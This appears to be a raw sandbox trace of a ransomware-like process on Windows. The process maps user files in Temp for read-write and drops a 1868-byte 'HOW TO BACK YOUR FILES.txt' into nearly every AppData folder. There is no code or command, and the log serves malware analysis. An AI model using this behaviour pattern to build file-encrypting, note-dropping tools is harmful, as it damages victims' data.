Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_GB\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_GB\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_CA\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_CA\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\de_DE\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\de_DE\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\de_CH\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\de_CH\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\all\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\all\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages, protection = PAGE_READWRITE, maximum_size = 40704 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\Search\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\Search\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\assets\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\LocalLow\Adobe\Acrobat\DC\assets\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\IconCache.db filename = C:\Users\FD1HVy\AppData\Local\IconCache.db, protection = PAGE_READWRITE, maximum_size = 70672 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\VirtualStore\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\VirtualStore\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\UNP\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\UNP\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\TileDataLayer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\TileDataLayer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDB.chk filename = C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDB.chk, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDB00005.log filename = C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDB00005.log, protection = PAGE_READWRITE, maximum_size = 2097920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBres00001.jrs filename = C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBres00001.jrs, protection = PAGE_READWRITE, maximum_size = 2097920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBres00002.jrs filename = C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, protection = PAGE_READWRITE, maximum_size = 2097920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBtmp.log filename = C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\EDBtmp.log, protection = PAGE_READWRITE, maximum_size = 2097920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\TileDataLayer\Database\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\-xgy F.avi filename = C:\Users\FD1HVy\AppData\Local\Temp\-xgy F.avi, protection = PAGE_READWRITE, maximum_size = 21392 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\0xiOmO5gYWzu9YHVTaL.flv filename = C:\Users\FD1HVy\AppData\Local\Temp\0xiOmO5gYWzu9YHVTaL.flv, protection = PAGE_READWRITE, maximum_size = 76864 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\2oF0Av0QrLDtDkD.wav filename = C:\Users\FD1HVy\AppData\Local\Temp\2oF0Av0QrLDtDkD.wav, protection = PAGE_READWRITE, maximum_size = 81216 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\5s306805lW9yY5.flv filename = C:\Users\FD1HVy\AppData\Local\Temp\5s306805lW9yY5.flv, protection = PAGE_READWRITE, maximum_size = 6592 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\6U1EDzYg-f9jWV81ksXS.mp3 filename = C:\Users\FD1HVy\AppData\Local\Temp\6U1EDzYg-f9jWV81ksXS.mp3, protection = PAGE_READWRITE, maximum_size = 35072 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\8XHXvCH-33.ppt filename = C:\Users\FD1HVy\AppData\Local\Temp\8XHXvCH-33.ppt, protection = PAGE_READWRITE, maximum_size = 37680 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\9Fw4yFdueVF2 gt-.jpg filename = C:\Users\FD1HVy\AppData\Local\Temp\9Fw4yFdueVF2 gt-.jpg, protection = PAGE_READWRITE, maximum_size = 65024 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\a1awP8HsB2PYwBF.jpg filename = C:\Users\FD1HVy\AppData\Local\Temp\a1awP8HsB2PYwBF.jpg, protection = PAGE_READWRITE, maximum_size = 42672 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\BKy9YzkjWQ30.bmp filename = C:\Users\FD1HVy\AppData\Local\Temp\BKy9YzkjWQ30.bmp, protection = PAGE_READWRITE, maximum_size = 3712 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\dQ5fctO2o1SJGoo.rtf filename = C:\Users\FD1HVy\AppData\Local\Temp\dQ5fctO2o1SJGoo.rtf, protection = PAGE_READWRITE, maximum_size = 59696 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\e3plLTF8rg8Bcl.rtf filename = C:\Users\FD1HVy\AppData\Local\Temp\e3plLTF8rg8Bcl.rtf, protection = PAGE_READWRITE, maximum_size = 40608 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\e5htkWuyW-.mp3 filename = C:\Users\FD1HVy\AppData\Local\Temp\e5htkWuyW-.mp3, protection = PAGE_READWRITE, maximum_size = 53936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\g62RCL.ods filename = C:\Users\FD1HVy\AppData\Local\Temp\g62RCL.ods, protection = PAGE_READWRITE, maximum_size = 53616 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\HJlCCXK9.m4a filename = C:\Users\FD1HVy\AppData\Local\Temp\HJlCCXK9.m4a, protection = PAGE_READWRITE, maximum_size = 67312 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\kjcfUyRTkdNG.mp4 filename = C:\Users\FD1HVy\AppData\Local\Temp\kjcfUyRTkdNG.mp4, protection = PAGE_READWRITE, maximum_size = 61920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\ligXXA-u.docx filename = C:\Users\FD1HVy\AppData\Local\Temp\ligXXA-u.docx, protection = PAGE_READWRITE, maximum_size = 51920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\LPFVkW.rtf filename = C:\Users\FD1HVy\AppData\Local\Temp\LPFVkW.rtf, protection = PAGE_READWRITE, maximum_size = 30064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\Mo4kmfIs.pptx filename = C:\Users\FD1HVy\AppData\Local\Temp\Mo4kmfIs.pptx, protection = PAGE_READWRITE, maximum_size = 92928 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\N99DG-cSyKfo.m4a filename = C:\Users\FD1HVy\AppData\Local\Temp\N99DG-cSyKfo.m4a, protection = PAGE_READWRITE, maximum_size = 10864 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\NRJRu.jpg filename = C:\Users\FD1HVy\AppData\Local\Temp\NRJRu.jpg, protection = PAGE_READWRITE, maximum_size = 24512 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\PhFbbnJJmisYmK.mp3 filename = C:\Users\FD1HVy\AppData\Local\Temp\PhFbbnJJmisYmK.mp3, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\RnruXrOBs.pdf filename = C:\Users\FD1HVy\AppData\Local\Temp\RnruXrOBs.pdf, protection = PAGE_READWRITE, maximum_size = 40240 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\t2aoDOtGdN.mkv filename = C:\Users\FD1HVy\AppData\Local\Temp\t2aoDOtGdN.mkv, protection = PAGE_READWRITE, maximum_size = 49552 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\ubUCYWoEFDw-iWXBm6j.bmp filename = C:\Users\FD1HVy\AppData\Local\Temp\ubUCYWoEFDw-iWXBm6j.bmp, protection = PAGE_READWRITE, maximum_size = 91952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\vY48FtNhH7zPDhB.mp3 filename = C:\Users\FD1HVy\AppData\Local\Temp\vY48FtNhH7zPDhB.mp3, protection = PAGE_READWRITE, maximum_size = 83104 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\X2hoDzalyI1 oZ3p1skU.odt filename = C:\Users\FD1HVy\AppData\Local\Temp\X2hoDzalyI1 oZ3p1skU.odt, protection = PAGE_READWRITE, maximum_size = 19088 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\XxveXq1B_Wj6hbxcpu_e.pptx filename = C:\Users\FD1HVy\AppData\Local\Temp\XxveXq1B_Wj6hbxcpu_e.pptx, protection = PAGE_READWRITE, maximum_size = 8880 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\Y2Oh-tZfDsyI.rtf filename = C:\Users\FD1HVy\AppData\Local\Temp\Y2Oh-tZfDsyI.rtf, protection = PAGE_READWRITE, maximum_size = 79264 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\YNX4rNLsFP9VXo9.png filename = C:\Users\FD1HVy\AppData\Local\Temp\YNX4rNLsFP9VXo9.png, protection = PAGE_READWRITE, maximum_size = 50640 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\z6og.pps filename = C:\Users\FD1HVy\AppData\Local\Temp\z6og.pps, protection = PAGE_READWRITE, maximum_size = 81408 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Temp\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Temp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Publishers\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Publishers\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\PeerDistRepub\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\PeerDistRepub\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\INetHistory\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\INetHistory\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\INetCookies\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\INetCookies\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\INetCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows_ie_ac_001\AC\INetCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG1 filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG1, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG1 filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG1, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\LocalCache\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\AppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\AC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1 filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
